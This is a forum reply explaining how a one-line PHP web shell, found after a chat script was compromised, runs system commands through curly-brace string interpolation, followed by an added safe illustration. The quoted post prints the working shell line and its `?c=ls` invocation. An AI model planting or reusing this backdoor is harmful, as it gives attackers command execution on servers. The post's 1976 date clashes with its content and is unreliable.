Posted by Tim Martin on 12/16/76 11:57
Oski wrote:
> our server got hacked through a security hole in an open source php
> chat script.
> (nothing new so far, ok!)
>
> This chat script allowed the user to create a new php script on our
> server, with the following content: (the code between the two "..."
> from the hacker):
>
> <?
> $name = "{$x[system($c)]}";
> // some more lines omitted ...
> ?>
>
> save these lines as e.g. /sys.php and call it with your browser:
> http://localhost/sys.php?c=ls
> and you can execute any system command and see the results!
>
> But: How does it work? The content of a variable being executed and
> written to the browser?
> If it were just "system($c)" then I understood.
If you write
$a = "{$x['key']}";
then $a gets the value $x['key'] as expected.
$a = $x[system($c)];
then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).
It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.
I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.
Tim
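An added illustration of Tim's explanation (this is example code written for this page, not code from the thread or from the chat script). PHP's complex (curly) string syntax parses whatever follows `{$` as a full variable expression, so an array index that is a function call is evaluated while the string is being built. Below, system() is swapped for a hypothetical tracer() helper that records that it ran and returns its argument; $c is set inline because the original got it from the request (`?c=ls`), presumably via register_globals, which is an assumption about the omitted lines.

```php
<?php
// Added example (not code from the original thread).
// Shows that "{$x[f($c)]}" calls f() while the string is assembled,
// and that it is only shorthand for $x[f($c)].

$calls = [];

// Hypothetical stand-in for system(): records the call and returns its
// argument. The real system() runs the command, echoes its output to the
// response and returns the LAST line of that output.
function tracer(string $arg): string
{
    global $calls;
    $calls[] = $arg;
    return $arg;
}

$x = ['ls' => 'value stored under key ls'];
$c = 'ls';   // assumed: in the original this came from ?c=ls

// Plain interpolation, exactly as the manual documents it.
$a = "{$x['ls']}";

// Same syntax with a function call as the index: tracer() executes as a
// side effect of evaluating the string literal, and its return value is
// then used as the array key.
$name = "{$x[tracer($c)]}";

echo "a    = $a\n";
echo "name = $name\n";
echo "tracer() ran " . count($calls) . " time(s) with: " . implode(', ', $calls) . "\n";

// Written outside a string the statement reads the same and behaves the same;
// the quoted form adds nothing but a place to hide it.
$same = $x[tracer($c)];
echo "equivalent form gives: $same\n";

// The attacker's variant differs only in the function name. Printed as a
// literal here, deliberately not executed.
$payload = '"{$x[system($c)]}"';
echo "attacker form (not executed): \$name = $payload;\n";
```

Run with `php demo.php`; tracer() is reported twice, once per string that named it. With system() in its place, the command output has already been echoed to the browser by the time the index is looked up (so "you can see the results"), and $name ends up as $x[<last output line>], which is almost certainly an undefined key, a fact the attacker does not care about. Note also what the string rule does not change: the root problem in the incident is a web application that wrote user-controlled content into a file the server then executed as PHP, and no amount of caution about interpolation syntax repairs that.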